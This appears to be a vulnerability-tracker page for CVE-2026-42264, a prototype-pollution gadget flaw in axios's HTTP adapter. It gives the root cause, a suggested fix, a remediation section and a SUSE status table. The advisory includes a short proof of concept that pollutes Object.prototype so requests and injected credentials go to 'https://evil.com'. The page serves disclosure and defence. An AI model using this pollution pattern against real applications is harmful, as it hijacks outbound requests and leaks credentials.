axios CVE-2026-42264
CRITICALSeverity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
AC:H because exploitation requires a pre-existing prototype pollution write primitive in the same process; AV:N and high C/I retained since impact lands on outbound network requests and credential/integrity loss, A:N as no availability impact.
AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
Primary rating from NVD.
CVSS VectorNVD
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Lifecycle Timeline
7Blast Radius
ecosystem impact- 273 npm packages depend on axios (189 direct, 84 indirect)
Ecosystem-wide dependent count for version 1.0.0.
DescriptionNVD
Summary
Five config properties in the HTTP adapter are read via direct property access without hasOwnProperty guards, making them exploitable as prototype pollution gadgets. When Object.prototype is polluted by another dependency in the same process, axios silently picks up these polluted values on every outbound HTTP request.
Affected Properties
config.auth(lib/adapters/http.jsline 617) Injects attacker-controlledAuthorizationheader on all requests.config.baseURL(lib/helpers/resolveConfig.jsline 18) Redirects all requests using relative URLs to an attacker-controlled server.config.socketPath(lib/adapters/http.jsline 669) Redirects requests to internal Unix sockets (e.g. Docker daemon).config.beforeRedirect(lib/adapters/http.jsline 698) Executes attacker-supplied callback during HTTP redirects.config.insecureHTTPParser(lib/adapters/http.jsline 712) Enables Node.js insecure HTTP parser on all requests.
Proof of Concept
const axios = require('axios');
// Prototype pollution from a vulnerable dependency in the same process
Object.prototype.auth = { username: 'attacker', password: 'exfil' };
Object.prototype.baseURL = 'https://evil.com';
await axios.get('/api/users');
// Request is sent to: https://evil.com/api/users
// With header: Authorization: Basic YXR0YWNrZXI6ZXhmaWw=
// Attacker receives both the request and injected credentialsImpact
- Credential injection: Every axios request includes an attacker-controlled
Authorizationheader, leaking request contents to any server that logs auth headers. - Request hijacking: All requests using relative URLs are silently redirected to an attacker-controlled server.
- SSRF: Requests can be redirected to internal Unix sockets, enabling container escape in Docker environments.
- Code execution: Attacker-supplied functions execute during HTTP redirects.
- Parser weakening: Insecure HTTP parser enabled on all requests, enabling request smuggling.
Root Cause
mergeConfig() iterates Object.keys({...config1, ...config2}), which only returns own properties. When neither the defaults nor the user config sets these properties, they are absent from the merged config. The HTTP adapter then reads them via direct property access (config.auth, config.socketPath, etc.), which traverses the prototype chain and picks up polluted values.
The own() helper at lib/adapters/http.js line 336 exists and guards 8 other properties (data, lookup, family, httpVersion, http2Options, responseType, responseEncoding, transport) from this exact attack. The 5 properties listed above are not included in this protection.
Suggested Fix
Apply the existing own() helper to all affected properties:
const configAuth = own('auth');
if (configAuth) {
const username = configAuth.username || '';
const password = configAuth.password || '';
auth = username + ':' + password;
}Same pattern for socketPath, beforeRedirect, insecureHTTPParser, and a hasOwnProperty check for baseURL in resolveConfig.js.
Articles & Coverage 1
AnalysisAI
Prototype pollution read-side gadgets in the axios HTTP adapter (npm, versions >=1.0.0 to <1.15.2) allow an attacker who has already polluted Object.prototype in the same Node.js process to hijack every outbound request - injecting attacker-controlled Authorization headers, redirecting relative-URL requests to an external server, pointing requests at internal Unix sockets (SSRF/container escape), forcing Node's insecure HTTP parser, and even executing an attacker-supplied beforeRedirect callback. The flaw stems from five config properties (auth, baseURL, socketPath, beforeRedirect, insecureHTTPParser) being read via direct property access that traverses the prototype chain, unlike eight sibling properties already guarded by an own() helper. A working proof-of-concept is published in the GHSA advisory, but EPSS is only 0.03% and the issue is not in CISA KEV - no public exploit identified at time of analysis as a standalone attack, and it requires a separate prototype pollution primitive to fire.
Technical ContextAI
axios is one of the most widely used HTTP client libraries for Node.js and the browser. This is a CWE-1321 (Prototype Pollution) read-side gadget rather than a write primitive: axios does not itself allow polluting Object.prototype, but its Node HTTP adapter (lib/adapters/http.js) and lib/helpers/resolveConfig.js read configuration values such as config.auth (line 617), config.baseURL (resolveConfig.js line 18), config.socketPath (line 669), config.beforeRedirect (line 698), and config.insecureHTTPParser (line 712) using plain dotted access. Because mergeConfig() builds the effective config via Object.keys({...config1, ...config2}) - which only enumerates own properties - any of these five keys that the application never explicitly sets are simply absent from the merged object, so a direct read falls through to a polluted Object.prototype value. An existing own() helper (http.js line 336) already guards data, lookup, family, httpVersion, http2Options, responseType, responseEncoding, and transport against exactly this class of attack; the five affected properties were never added to that protection. CPE/package scope is pkg:npm/axios.
RemediationAI
Vendor-released patch: upgrade axios to 1.15.2 or later (fix delivered via PR https://github.com/axios/axios/pull/10779 and commit 47915144662f2733e6c051bdcb895a8c8f0586aa, release https://github.com/axios/axios/releases/tag/v1.15.2); Red Hat consumers should apply RHSA-2026:33173. Because this is a read-side gadget, also remediate the root cause: audit and patch any dependency that permits prototype pollution writes, since without a pollution primitive the gadget cannot fire. If you cannot upgrade axios immediately, harden the runtime by freezing the prototype early in process startup with Object.freeze(Object.prototype) (trade-off: can break libraries that legitimately extend built-in prototypes, so test thoroughly), and explicitly set the affected fields on your axios config/instance defaults - auth, baseURL, socketPath, beforeRedirect, and insecureHTTPParser - so they become own properties and never fall through to the prototype chain (trade-off: must be applied on every instance and is easy to miss). Review the advisory at https://github.com/axios/axios/security/advisories/GHSA-q8qp-cvcw-x6jj for details.
More in Prototype Pollution
View allPrototype pollution in Adobe Acrobat Reader versions 24.001.30356, 26.001.21367 and earlier enables arbitrary code execu
Prototype pollution in the farinspace Partners WordPress plugin (versions up to and including 0.2.0) enables remote unau
Prototype pollution vulnerability in 'deephas' versions 1.0.0 through 1.0.5 allows attacker to cause a denial of service
A Prototype Pollution issue in Cronvel Tree-kit v.0.7.4 and before allows a remote attacker to execute arbitrary code vi
A Prototype Pollution issue in Aliconnect /sdk v.0.0.6 allows an attacker to execute arbitrary code via the aim function
All versions of the package safe-eval are vulnerable to Prototype Pollution via the safeEval function, due to improper s
This affects the package vm2 before 3.9.4 via a Prototype Pollution attack vector, which can lead to execution of arbitr
Prototype Pollution in chargeover redoc v2.0.9-rc.69 allows attackers to execute arbitrary code or cause a Denial of Ser
alizeait unflatto <= 1.0.2 was discovered to contain a prototype pollution via the method exports.unflatto at /dist/inde
A vulnerability exists in the 'dagre-d3-es' Node.js package version 7.0.9, specifically within the 'bk' module's addConf
A Prototype Pollution vulnerability in the util-deps.addFileDepend function of magix-combine-ex versions thru 1.2.10 all
Chartist 1.x through 1.3.0 allows Prototype Pollution via the extend function. Rated critical severity (CVSS 9.8), this
Vendor StatusVendor
SUSE
Severity: High| Product | Status |
|---|---|
| SUSE Linux Enterprise Desktop 15 SP7 | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP7 | Fixed |
| SUSE Linux Enterprise Module for Python 3 15 SP7 | Fixed |
| SUSE Linux Enterprise Module for SAP Applications 15 SP7 | Fixed |
| SUSE Linux Enterprise Server 15 SP7 | Fixed |
| SUSE Linux Enterprise Server 16.0 | Fixed |
| SUSE Linux Enterprise Server 16.1 | Fixed |
| SUSE Linux Enterprise Server for SAP Applications 15 SP7 | Fixed |
| SUSE Linux Enterprise Server for SAP Applications 15 SP7 | Fixed |
| SUSE Linux Enterprise Server for SAP applications 16.0 | Fixed |
| SUSE Linux Enterprise Server for SAP applications 16.0 | Fixed |
| SUSE Linux Enterprise Server for SAP applications 16.1 | Fixed |
| SUSE Linux Enterprise Server for SAP applications 16.1 | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP4 | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP5 | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS | Fixed |
| SUSE Linux Enterprise Module for Python 3 15 SP6 | Fixed |
| SUSE Linux Enterprise Module for Server Applications 15 SP4 | Fixed |
| SUSE Linux Enterprise Module for Server Applications 15 SP5 | Fixed |
| SUSE Linux Enterprise Server 15 SP4 | Fixed |
| SUSE Linux Enterprise Server 15 SP4-LTSS | Fixed |
| SUSE Linux Enterprise Server 15 SP5 | Fixed |
| SUSE Linux Enterprise Server 15 SP5-LTSS | Fixed |
| SUSE Linux Enterprise Server 15 SP6 | Fixed |
| SUSE Linux Enterprise Server 15 SP6-LTSS | Fixed |
| SUSE Linux Enterprise Server for SAP Applications 15 SP6 | Fixed |
| SUSE Linux Enterprise Server for SAP Applications 15 SP6 | Fixed |
| SUSE Manager Proxy 4.3 | Fixed |
| SUSE Manager Proxy LTS 4.3 | Fixed |
| SUSE Manager Retail Branch Server 4.3 | Fixed |
| SUSE Manager Retail Branch Server LTS 4.3 | Fixed |
| SUSE Manager Server 4.3 | Fixed |
| SUSE Manager Server LTS 4.3 | Fixed |
| SUSE CaaS Platform 4.0 | Fixed |
| SUSE Enterprise Storage 6 | Fixed |
| SUSE Enterprise Storage 7 | Fixed |
| SUSE Enterprise Storage 7.1 | Fixed |
| SUSE Linux Enterprise Desktop 15 SP6 | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP1 | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP1-ESPOS | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP1-LTSS | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP2 | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP2-ESPOS | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP3 | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP3-ESPOS | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP6 | Fixed |
| SUSE Linux Enterprise Module for SAP Applications 15 SP3 | Fixed |
| SUSE Linux Enterprise Module for SAP Applications 15 SP4 | Fixed |
| SUSE Linux Enterprise Module for SAP Applications 15 SP5 | Fixed |
| SUSE Linux Enterprise Module for SAP Applications 15 SP6 | Fixed |
| SUSE Linux Enterprise Module for Server Applications 15 SP1 | Fixed |
| SUSE Linux Enterprise Module for Server Applications 15 SP2 | Fixed |
| SUSE Linux Enterprise Module for Server Applications 15 SP3 | Fixed |
| SUSE Linux Enterprise Real Time 15 SP2 | Fixed |
| SUSE Linux Enterprise Real Time 15 SP3 | Fixed |
| SUSE Linux Enterprise Real Time 15 SP4 | Fixed |
| SUSE Linux Enterprise Server 15 SP1 | Fixed |
| SUSE Linux Enterprise Server 15 SP1-BCL | Fixed |
| SUSE Linux Enterprise Server 15 SP1-LTSS | Fixed |
| SUSE Linux Enterprise Server 15 SP2 | Fixed |
| SUSE Linux Enterprise Server 15 SP2-BCL | Fixed |
| SUSE Linux Enterprise Server 15 SP2-LTSS | Fixed |
| SUSE Linux Enterprise Server 15 SP3 | Fixed |
| SUSE Linux Enterprise Server 15 SP3-BCL | Fixed |
| SUSE Linux Enterprise Server 15 SP3-LTSS | Fixed |
| SUSE Linux Enterprise Server for SAP Applications 15 SP1 | Fixed |
| SUSE Linux Enterprise Server for SAP Applications 15 SP2 | Fixed |
| SUSE Linux Enterprise Server for SAP Applications 15 SP3 | Fixed |
| SUSE Linux Enterprise Server for SAP Applications 15 SP3 | Fixed |
| SUSE Linux Enterprise Server for SAP Applications 15 SP4 | Fixed |
| SUSE Linux Enterprise Server for SAP Applications 15 SP4 | Fixed |
| SUSE Linux Enterprise Server for SAP Applications 15 SP5 | Fixed |
| SUSE Linux Enterprise Server for SAP Applications 15 SP5 | Fixed |
| SUSE Manager Proxy 4.0 | Fixed |
| SUSE Manager Proxy 4.1 | Fixed |
| SUSE Manager Proxy 4.2 | Fixed |
| SUSE Manager Retail Branch Server 4.0 | Fixed |
| SUSE Manager Retail Branch Server 4.1 | Fixed |
| SUSE Manager Retail Branch Server 4.2 | Fixed |
| SUSE Manager Server 4.0 | Fixed |
| SUSE Manager Server 4.1 | Fixed |
| SUSE Manager Server 4.2 | Fixed |
| openSUSE Leap 15.3 | Fixed |
| openSUSE Leap 15.4 | Fixed |
| openSUSE Leap 15.5 | Fixed |
Share
External POC / Exploit Code
Leaving vuln.today
GHSA-q8qp-cvcw-x6jj